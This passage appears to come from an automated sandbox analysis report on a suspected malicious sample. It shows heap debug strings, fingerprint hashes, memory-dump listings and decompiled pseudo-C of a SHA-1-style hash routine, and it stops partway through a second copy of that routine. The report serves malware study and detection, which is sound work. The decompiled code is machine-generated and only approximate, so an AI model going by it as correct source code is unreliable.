                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 025EDABE
                                  • HEAP: , xrefs: 025EDAB3, 025EDB9B
                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 025EDBA6
                                  • HEAP[%wZ]: , xrefs: 025EDAA6, 025EDB8E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                  • API String ID: 0-1657114761
                                  • Opcode ID: 0a77c3b627b32626716fd1d74448572e005db7a6563c4f37ce51d95d860033e4
                                  • Instruction ID: aefd44fe78998f2b4ac8194b3ea0c82f6076cf88945d8c98218dbc32e13e66a3
                                  • Opcode Fuzzy Hash: 0a77c3b627b32626716fd1d74448572e005db7a6563c4f37ce51d95d860033e4
                                  • Instruction Fuzzy Hash: CE02C071A00606CFDB28CF68C4A5B7EBBF1FF48304F198599E4568B691D334E981CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • HEAP: , xrefs: 025FA498
                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 025FA4AC
                                  • HEAP[%wZ]: , xrefs: 025FA48B
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-2419525547
                                  • Opcode ID: 237786242b7d485b4c550a19d32c455e2778245fb336c162ee99bbf3ab31ed9f
                                  • Instruction ID: 0c4c9a765fd524719043e54cb85b35cb1bee43623c161bb1d24f506d56c7553a
                                  • Opcode Fuzzy Hash: 237786242b7d485b4c550a19d32c455e2778245fb336c162ee99bbf3ab31ed9f
                                  • Instruction Fuzzy Hash: B6C2AA75A042169FCB18CF19C494A7A7BB2FF84314B29C5ADEC5A8B355E730EC41CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • HEAP: , xrefs: 025FACC2
                                  • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 025FACD9
                                  • HEAP[%wZ]: , xrefs: 025FACB5
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-2419525547
                                  • Opcode ID: 44bebca7f3c201c1c154a05a5c2fc773b6ae401a0b957f6d0413613a7357f768
                                  • Instruction ID: 3c29c10ed168658bdc2d792bc9af5745cf7f528b96ef8530aead76cca86eac2d
                                  • Opcode Fuzzy Hash: 44bebca7f3c201c1c154a05a5c2fc773b6ae401a0b957f6d0413613a7357f768
                                  • Instruction Fuzzy Hash: 69A2A070904255DFDB29CF68C491BADBBB2FF48308F14859EE88A9B255D734E881CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • HEAP: , xrefs: 025FDC1C
                                  • HEAP[%wZ]: , xrefs: 025FDC0F
                                  • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 025FDC30
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                  • API String ID: 0-212623055
                                  • Opcode ID: dc3c61c74fef3adf057a39815cbddff38bbc6b77ce18983ab255464b2770871a
                                  • Instruction ID: 92a93247f5c8287c653e8048d4d571ccea016fb234282ac94a2b4fa90bc0e369
                                  • Opcode Fuzzy Hash: dc3c61c74fef3adf057a39815cbddff38bbc6b77ce18983ab255464b2770871a
                                  • Instruction Fuzzy Hash: D6720E71901259DFDB25CFA8C891BBDBBF1FF08314F04845AE996AB291D334A841CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-2419525547
                                  • Opcode ID: d0f318bce9a725b4e19463b8ee7e5b2c3378200fd5bdc1ec2cfd41772f22c6cd
                                  • Instruction ID: 5c32478c6dceff01693e8d4ff5a8250391c3868c65b689b6c5de691adaff92cd
                                  • Opcode Fuzzy Hash: d0f318bce9a725b4e19463b8ee7e5b2c3378200fd5bdc1ec2cfd41772f22c6cd
                                  • Instruction Fuzzy Hash: F372BD70A00606DFDB68CF14C491FBABBB2FF89318F15849DE94A8B651D730E941CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 025F9636
                                  • HEAP: , xrefs: 025F9623
                                  • HEAP[%wZ]: , xrefs: 025F9616
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                  • API String ID: 0-385592399
                                  • Opcode ID: c8f9ae66c6ce741fce91d309c98f14a3649431b8d9e0dc8da4419c4c74ccb9a0
                                  • Instruction ID: f388a3e79286bf43e4aded8a20414ed1fd5dd72775df92c93f5137ebb98bc3bb
                                  • Opcode Fuzzy Hash: c8f9ae66c6ce741fce91d309c98f14a3649431b8d9e0dc8da4419c4c74ccb9a0
                                  • Instruction Fuzzy Hash: 7CD1D171A00556DFDB14CFA9C480BBABBF9BF84304F24819DE6519B245E730EE41CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • HEAP: , xrefs: 02602D14
                                  • HEAP[%wZ]: , xrefs: 02602D07
                                  • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 02602D1F
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                  • API String ID: 0-1596344177
                                  • Opcode ID: 8adb3c76f06a53ad5d7a59e13d156e646040cacc813195b3b43f1e93fc736c68
                                  • Instruction ID: 4661e59798f7dceb4019ed5703b0e23cc5e0cf3ca6f4f42f479632568faabc7b
                                  • Opcode Fuzzy Hash: 8adb3c76f06a53ad5d7a59e13d156e646040cacc813195b3b43f1e93fc736c68
                                  • Instruction Fuzzy Hash: 4EB19E31600606DFCB69CF28C4D4AB9BBF1FF49314B1586A9E85A8B691D730E880CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • HEAP: , xrefs: 026258E4
                                  • HEAP[%wZ]: , xrefs: 026258D7
                                  • Heap block at %p modified at %p past requested size of %lx, xrefs: 026258F7
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                  • API String ID: 0-3722492067
                                  • Opcode ID: d89f6af56f021e24bf3878066357d7d3198dad0e961cb8490128a1149ac86d01
                                  • Instruction ID: 1b367922cdc78eea4a6668800dcc24f9edc0e870855fbd655bfd82936652284f
                                  • Opcode Fuzzy Hash: d89f6af56f021e24bf3878066357d7d3198dad0e961cb8490128a1149ac86d01
                                  • Instruction Fuzzy Hash: 52410E35620A70DFD77C8E19C844AB277E5EF44764BC48889E8D7CB281D369E84ADF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: *.*$MUI
                                  • API String ID: 0-3752369296
                                  • Opcode ID: 8205da5e35873b2fd7f9c2297f96fc8d4b5b9856c92819bdce18dc56e149cd0a
                                  • Instruction ID: cec14e1583a007899e00c150dba0e821f63ff864324a41446e02632ce26a7372
                                  • Opcode Fuzzy Hash: 8205da5e35873b2fd7f9c2297f96fc8d4b5b9856c92819bdce18dc56e149cd0a
                                  • Instruction Fuzzy Hash: 53C172359056289ACF71DF28CC49B9AB7B4EF48740F0482DAE849E7390EB709AD4CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-3916222277
                                  • Opcode ID: 3a30dde500e148541b1901a97a2ae806d91668aca4308796bdee4a01a326b4e0
                                  • Instruction ID: 8990e8c839eabc36310a814d37e3b8e57f0a26cefe462e2544fb7b2d363344ed
                                  • Opcode Fuzzy Hash: 3a30dde500e148541b1901a97a2ae806d91668aca4308796bdee4a01a326b4e0
                                  • Instruction Fuzzy Hash: A7A268729012699FEF758F18CC85BE9BBB5BB09304F0484EAE649A3210D7719EC4CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Similarity
                                  • API ID:
                                  • String ID: 8@8
                                  • API String ID: 0-222468769
                                  • Opcode ID: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                  • Instruction ID: 2736c0cd9dfe6643921b0ce5db199fff3b1f66a2bc1d86850acd422c5b744aa8
                                  • Opcode Fuzzy Hash: 52a7b4fd9904778a68f426b789c55f952f178534bf943c7b801e7968525b1fea
                                  • Instruction Fuzzy Hash: ACF16371A00209AFDF16CFA4C840BFEBBB9FF44704F14846AE905AB290D375D981CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E72488C7B(void* __ecx, void* __edx, signed int* _a4) {
                                  				char _v5;
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				char _v304;
                                  				signed char* _t278;
                                  				signed int* _t279;
                                  				signed int _t280;
                                  				signed int _t286;
                                  				signed int _t289;
                                  				signed int _t293;
                                  				signed int _t296;
                                  				signed int _t300;
                                  				signed int _t304;
                                  				signed int _t306;
                                  				signed int _t312;
                                  				signed int _t320;
                                  				signed int _t322;
                                  				signed int _t325;
                                  				signed int _t327;
                                  				signed int _t336;
                                  				signed int _t342;
                                  				signed int _t343;
                                  				signed int _t348;
                                  				signed int _t358;
                                  				signed int _t362;
                                  				signed int _t363;
                                  				signed int _t367;
                                  				signed int _t370;
                                  				signed int _t374;
                                  				signed int _t375;
                                  				signed int _t405;
                                  				signed int _t410;
                                  				signed int _t416;
                                  				signed int _t419;
                                  				signed int _t426;
                                  				signed int _t429;
                                  				signed int _t438;
                                  				signed int _t440;
                                  				signed int _t443;
                                  				signed int _t451;
                                  				signed int _t466;
                                  				signed int _t469;
                                  				signed int _t470;
                                  				signed int _t471;
                                  				signed int _t477;
                                  				signed int _t485;
                                  				signed int _t486;
                                  				signed int* _t487;
                                  				signed int* _t490;
                                  				signed int _t497;
                                  				signed int _t500;
                                  				signed int _t505;
                                  				signed int _t508;
                                  				signed int _t511;
                                  				signed int _t514;
                                  				signed int _t515;
                                  				signed int _t519;
                                  				signed int _t531;
                                  				signed int _t534;
                                  				signed int _t541;
                                  				char* _t547;
                                  				char* _t549;
                                  				char* _t560;
                                  
                                  				_t547 = _t549;
                                  				_t490 = _a4;
                                  				_t358 = 0;
                                  				_t3 =  &(_t490[7]); // 0x1b
                                  				_t278 = _t3;
                                  				do {
                                  					 *(_t547 + _t358 * 4 - 0x14c) = ((( *(_t278 - 1) & 0x000000ff) << 0x00000008 |  *_t278 & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
                                  					 *(_t547 + _t358 * 4 - 0x148) = (((_t278[3] & 0x000000ff) << 0x00000008 | _t278[4] & 0x000000ff) << 0x00000008 | _t278[5] & 0x000000ff) << 0x00000008 | _t278[6] & 0x000000ff;
                                  					 *(_t547 + _t358 * 4 - 0x144) = (((_t278[7] & 0x000000ff) << 0x00000008 | _t278[8] & 0x000000ff) << 0x00000008 | _t278[9] & 0x000000ff) << 0x00000008 | _t278[0xa] & 0x000000ff;
                                  					 *(_t547 + _t358 * 4 - 0x140) = (((_t278[0xb] & 0x000000ff) << 0x00000008 | _t278[0xc] & 0x000000ff) << 0x00000008 | _t278[0xd] & 0x000000ff) << 0x00000008 | _t278[0xe] & 0x000000ff;
                                  					_t358 = _t358 + 4;
                                  					_t278 =  &(_t278[0x10]);
                                  				} while (_t358 < 0x10);
                                  				_t279 =  &_v304;
                                  				_v8 = 0x10;
                                  				do {
                                  					_t405 =  *(_t279 - 0x18);
                                  					_t466 =  *(_t279 - 0x14);
                                  					_t362 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t405;
                                  					asm("rol ecx, 1");
                                  					asm("rol ebx, 1");
                                  					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t466;
                                  					_t279[8] = _t362;
                                  					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
                                  					_t279 =  &(_t279[4]);
                                  					asm("rol ebx, 1");
                                  					asm("rol edx, 1");
                                  					_t47 =  &_v8;
                                  					 *_t47 = _v8 - 1;
                                  					_t279[6] = _t320 ^ _t405;
                                  					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t362 ^ _t466;
                                  				} while ( *_t47 != 0);
                                  				_t322 =  *_t490;
                                  				_t280 = _t490[1];
                                  				_t363 = _t490[2];
                                  				_t410 = _t490[3];
                                  				_v12 = _t322;
                                  				_v16 = _t490[4];
                                  				_v8 = 0;
                                  				do {
                                  					asm("rol ebx, 0x5");
                                  					_t469 = _v8;
                                  					_t497 = _t322 + ( !_t280 & _t410 | _t363 & _t280) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                  					_t325 = _v12;
                                  					asm("ror eax, 0x2");
                                  					_v16 = _t410;
                                  					_v12 = _t497;
                                  					asm("rol esi, 0x5");
                                  					_v8 = _t363;
                                  					_t416 = _t497 + ( !_t325 & _t363 | _t280 & _t325) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x148)) + _v16 + 0x5a827999;
                                  					_t500 = _t280;
                                  					asm("ror ebx, 0x2");
                                  					_v16 = _v8;
                                  					_t367 = _v12;
                                  					_v8 = _t325;
                                  					_t327 = _v8;
                                  					_v12 = _t416;
                                  					asm("rol edx, 0x5");
                                  					_t286 = _t416 + ( !_t367 & _t500 | _t325 & _t367) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x144)) + _v16 + 0x5a827999;
                                  					_t419 = _v12;
                                  					_v16 = _t500;
                                  					asm("ror ecx, 0x2");
                                  					_v8 = _t367;
                                  					_v12 = _t286;
                                  					asm("rol eax, 0x5");
                                  					_v16 = _t327;
                                  					_t505 = _t286 + ( !_t419 & _t327 | _t367 & _t419) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x140)) + _v16 + 0x5a827999;
                                  					_t363 = _v12;
                                  					_t289 = _v8;
                                  					asm("ror edx, 0x2");
                                  					_v8 = _t419;
                                  					_v12 = _t505;
                                  					asm("rol esi, 0x5");
                                  					_v16 = _t289;
                                  					_t280 = _v12;
                                  					_t508 = _t505 + ( !_t363 & _t289 | _t419 & _t363) +  *((intOrPtr*)(_t547 + _t469 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                  					_t410 = _v8;
                                  					asm("ror ecx, 0x2");
                                  					_t470 = _t469 + 5;
                                  					_t322 = _t508;
                                  					_v12 = _t322;
                                  					_v8 = _t470;
                                  				} while (_t470 < 0x14);
                                  				_t471 = 0x14;
                                  				do {
                                  					asm("rol esi, 0x5");
                                  					asm("ror eax, 0x2");
                                  					_v16 = _t410;
                                  					_t511 = _t508 + (_t410 ^ _t363 ^ _t280) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                  					_t336 = _v12;
                                  					_v12 = _t511;
                                  					asm("rol esi, 0x5");
                                  					_t426 = _t511 + (_t363 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                  					asm("ror ebx, 0x2");
                                  					_t514 = _t280;
                                  					_v16 = _t363;
                                  					_t370 = _v12;
                                  					_v12 = _t426;
                                  					asm("rol edx, 0x5");
                                  					asm("ror ecx, 0x2");
                                  					_t293 = _t426 + (_t280 ^ _t336 ^ _t370) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                  					_t429 = _v12;
                                  					_v8 = _t336;
                                  					_v8 = _t370;
                                  					_v12 = _t293;
                                  					asm("rol eax, 0x5");
                                  					_t471 = _t471 + 5;
                                  					_t363 = _v12;
                                  					asm("ror edx, 0x2");
                                  					_t147 = _t514 + 0x6ed9eba1; // 0x6ed9eb9f
                                  					_t515 = _t293 + (_t336 ^ _v8 ^ _t429) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x154)) + _t147;
                                  					_t296 = _v8;
                                  					_v8 = _t429;
                                  					_v12 = _t515;
                                  					asm("rol esi, 0x5");
                                  					_t410 = _v8;
                                  					_t508 = _t515 + (_t296 ^ _v8 ^ _t363) +  *((intOrPtr*)(_t547 + _t471 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
                                  					_v16 = _t296;
                                  					_t280 = _v12;
                                  					asm("ror ecx, 0x2");
                                  					_v12 = _t508;
                                  				} while (_t471 < 0x28);
                                  				_v8 = 0x28;
                                  				do {
                                  					asm("rol esi, 0x5");
                                  					_v16 = _t410;
                                  					asm("ror eax, 0x2");
                                  					_t519 = ((_t363 | _t280) & _t410 | _t363 & _t280) +  *((intOrPtr*)(_t547 + _v8 * 4 - 0x14c)) + _t508 + _v16 - 0x70e44324;
                                  					_t477 = _v12;
                                  					_v12 = _t519;
                                  					asm("rol esi, 0x5");
                                  					_t342 = _v8;
                                  					asm("ror edi, 0x2");
                                  					_t438 = ((_t280 | _t477) & _t363 | _t280 & _t477) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x148)) + _t519 + _v16 - 0x70e44324;
                                  					_v16 = _t363;
                                  					_t374 = _v12;
                                  					_v12 = _t438;
                                  					asm("rol edx, 0x5");
                                  					_v8 = _t280;
                                  					_t440 = ((_t477 | _t374) & _t280 | _t477 & _t374) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x144)) + _t438 + _v16 - 0x70e44324;
                                  					asm("ror ecx, 0x2");
                                  					_v16 = _v8;
                                  					_t300 = _v12;
                                  					_v8 = _t477;
                                  					_v12 = _t440;
                                  					asm("rol edx, 0x5");
                                  					asm("ror eax, 0x2");
                                  					_t531 = ((_t374 | _t300) & _t477 | _t374 & _t300) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x140)) + _t440 + _v16 - 0x70e44324;
                                  					_v16 = _v8;
                                  					_t443 = _t374;
                                  					_t363 = _v12;
                                  					_v8 = _t443;
                                  					_v12 = _t531;
                                  					asm("rol esi, 0x5");
                                  					_v16 = _v8;
                                  					_t508 = ((_t300 | _t363) & _t443 | _t300 & _t363) +  *((intOrPtr*)(_t547 + _t342 * 4 - 0x13c)) + _t531 + _v16 - 0x70e44324;
                                  					_t410 = _t300;
                                  					_t280 = _v12;
                                  					asm("ror ecx, 0x2");
                                  					_v12 = _t508;
                                  					_t343 = _t342 + 5;
                                  					_v8 = _t343;
                                  				} while (_t343 < 0x3c);
                                  				_t485 = 0x3c;
                                  				_v8 = 0x3c;
                                  				do {
                                  					asm("rol esi, 0x5");
                                  					_t486 = _v8;
                                  					asm("ror eax, 0x2");
                                  					_t534 = (_t410 ^ _t363 ^ _t280) +  *((intOrPtr*)(_t547 + _t485 * 4 - 0x14c)) + _t508 + _v16 - 0x359d3e2a;
                                  					_t348 = _v12;
                                  					_v16 = _t410;
                                  					_v12 = _t534;
                                  					asm("rol esi, 0x5");
                                  					asm("ror ebx, 0x2");
                                  					_t451 = (_t363 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x148)) + _t534 + _v16 - 0x359d3e2a;
                                  					_v16 = _t363;
                                  					_t375 = _v12;
                                  					_v12 = _t451;
                                  					asm("rol edx, 0x5");
                                  					_v16 = _t280;
                                  					asm("ror ecx, 0x2");
                                  					_t304 = (_t280 ^ _t348 ^ _t375) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x144)) + _t451 + _v16 - 0x359d3e2a;
                                  					_t410 = _v12;
                                  					_v12 = _t304;
                                  					asm("rol eax, 0x5");
                                  					_v16 = _t348;
                                  					_t541 = (_t348 ^ _t375 ^ _t410) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
                                  					_t306 = _t375;
                                  					_v8 = _t348;
                                  					asm("ror edx, 0x2");
                                  					_v8 = _t375;
                                  					do {
                                  						_t547 =  &_v5;
                                  						_t560 = _t547;
                                  						asm("cld");
                                  						_t363 = _v12;
                                  						_v12 = _t541;
                                  					} while (_t560 != 0);
                                  					asm("rol esi, 0x5");
                                  					_t485 = _t486 + 5;
                                  					_t508 = (_t306 ^ _t410 ^ _t363) +  *((intOrPtr*)(_t547 + _t486 * 4 - 0x13c)) + _t541 + _v16 - 0x359d3e2a;
                                  					_v16 = _t306;
                                  					_t280 = _v12;
                                  					asm("ror ecx, 0x2");
                                  					_v8 = _t410;
                                  					_v12 = _t508;
                                  					_v8 = _t485;
                                  				} while (_t485 < 0x50);
                                  				_t487 = _a4;
                                  				_t487[2] = _t487[2] + _t363;
                                  				_t487[3] = _t487[3] + _t410;
                                  				_t312 = _t487[4] + _v16;
                                  				 *_t487 =  *_t487 + _t508;
                                  				_t487[1] = _t487[1] + _t280;
                                  				_t487[4] = _t312;
                                  				_t487[0x17] = 0;
                                  				return _t312;
                                  			}


                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, Offset: 72480000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: (
                                  • API String ID: 0-3887548279
                                  • Opcode ID: 4bab60424770418080d1329d130b2de45f18aadf4c5a92880cb3f83b8d6dd13d
                                  • Instruction ID: 0aab09f8af9c8e30ff1c71eff72fa5d9ff68b6224264e7611c10e9aa90d2a9c1
                                  • Opcode Fuzzy Hash: 4bab60424770418080d1329d130b2de45f18aadf4c5a92880cb3f83b8d6dd13d
                                  • Instruction Fuzzy Hash: D6022CB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E72488C80(signed int* _a4) {
                                  				char _v5;
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				char _v304;
                                  				signed char* _t277;
                                  				signed int* _t278;
                                  				signed int _t279;
                                  				signed int _t285;
                                  				signed int _t288;
                                  				signed int _t292;
                                  				signed int _t295;
                                  				signed int _t299;
                                  				signed int _t303;
                                  				signed int _t305;
                                  				signed int _t311;
                                  				signed int _t318;
                                  				signed int _t320;
                                  				signed int _t323;
                                  				signed int _t325;
                                  				signed int _t334;
                                  				signed int _t340;
                                  				signed int _t341;
                                  				signed int _t346;
                                  				signed int _t353;
                                  				signed int _t357;
                                  				signed int _t358;
                                  				signed int _t362;
                                  				signed int _t365;
                                  				signed int _t369;
                                  				signed int _t370;
                                  				signed int _t399;
                                  				signed int _t404;
                                  				signed int _t410;
                                  				signed int _t413;
                                  				signed int _t420;
                                  				signed int _t423;
                                  				signed int _t432;
                                  				signed int _t434;
                                  				signed int _t437;
                                  				signed int _t445;
                                  				signed int _t459;
                                  				signed int _t462;
                                  				signed int _t463;
                                  				signed int _t464;
                                  				signed int _t470;
                                  				signed int _t478;
                                  				signed int _t479;
                                  				signed int* _t480;
                                  				signed int* _t481;
                                  				signed int _t488;
                                  				signed int _t491;
                                  				signed int _t496;
                                  				signed int _t499;
                                  				signed int _t502;
                                  				signed int _t505;
                                  				signed int _t506;
                                  				signed int _t510;
                                  				signed int _t522;
                                  				signed int _t525;
                                  				signed int _t532;
                                  				char* _t536;
                                  				char* _t544;
                                  
                                  				_t481 = _a4;
                                  				_t353 = 0;
                                  				_t2 =  &(_t481[7]); // 0x1b
                                  				_t277 = _t2;
                                  				do {
                                  					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                  					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                  					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                  					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                  					_t353 = _t353 + 4;
                                  					_t277 =  &(_t277[0x10]);
                                  				} while (_t353 < 0x10);
                                  				_t278 =  &_v304;
                                  				_v8 = 0x10;
                                  				do {
                                  					_t399 =  *(_t278 - 0x18);
                                  					_t459 =  *(_t278 - 0x14);
                                  					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                  					asm("rol ecx, 1");
                                  					asm("rol ebx, 1");
                                  					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                  					_t278[8] = _t357;
                                  					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                  					_t278 =  &(_t278[4]);
                                  					asm("rol ebx, 1");
                                  					asm("rol edx, 1");
                                  					_t46 =  &_v8;
                                  					 *_t46 = _v8 - 1;
                                  					_t278[6] = _t318 ^ _t399;
                                  					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                  				} while ( *_t46 != 0);
                                  				_t320 =  *_t481;
                                  				_t279 = _t481[1];
                                  				_t358 = _t481[2];
                                  				_t404 = _t481[3];
                                  				_v12 = _t320;
                                  				_v16 = _t481[4];
                                  				_v8 = 0;
                                  				do {
                                  					asm("rol ebx, 0x5");
                                  					_t462 = _v8;
                                  					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                  					_t323 = _v12;
                                  					asm("ror eax, 0x2");
                                  					_v16 = _t404;
                                  					_v12 = _t488;
                                  					asm("rol esi, 0x5");
                                  					_v8 = _t358;
                                  					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                  					_t491 = _t279;
                                  					asm("ror ebx, 0x2");
                                  					_v16 = _v8;
                                  					_t362 = _v12;
                                  					_v8 = _t323;
                                  					_t325 = _v8;
                                  					_v12 = _t410;
                                  					asm("rol edx, 0x5");
                                  					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                  					_t413 = _v12;
                                  					_v16 = _t491;
                                  					asm("ror ecx, 0x2");
                                  					_v8 = _t362;
                                  					_v12 = _t285;
                                  					asm("rol eax, 0x5");
                                  					_v16 = _t325;
                                  					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                  					_t358 = _v12;
                                  					_t288 = _v8;
                                  					asm("ror edx, 0x2");
                                  					_v8 = _t413;
                                  					_v12 = _t496;
                                  					asm("rol esi, 0x5");
                                  					_v16 = _t288;
                                  					_t279 = _v12;
                                  					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                  					_t404 = _v8;
                                  					asm("ror ecx, 0x2");
                                  					_t463 = _t462 + 5;
                                  					_t320 = _t499;
                                  					_v12 = _t320;
                                  					_v8 = _t463;
                                  				} while (_t463 < 0x14);
                                  				_t464 = 0x14;
                                  				do {
                                  					asm("rol esi, 0x5");
                                  					asm("ror eax, 0x2");
                                  					_v16 = _t404;
                                  					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                  					_t334 = _v12;
                                  					_v12 = _t502;
                                  					asm("rol esi, 0x5");
                                  					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                  					asm("ror ebx, 0x2");
                                  					_t505 = _t279;
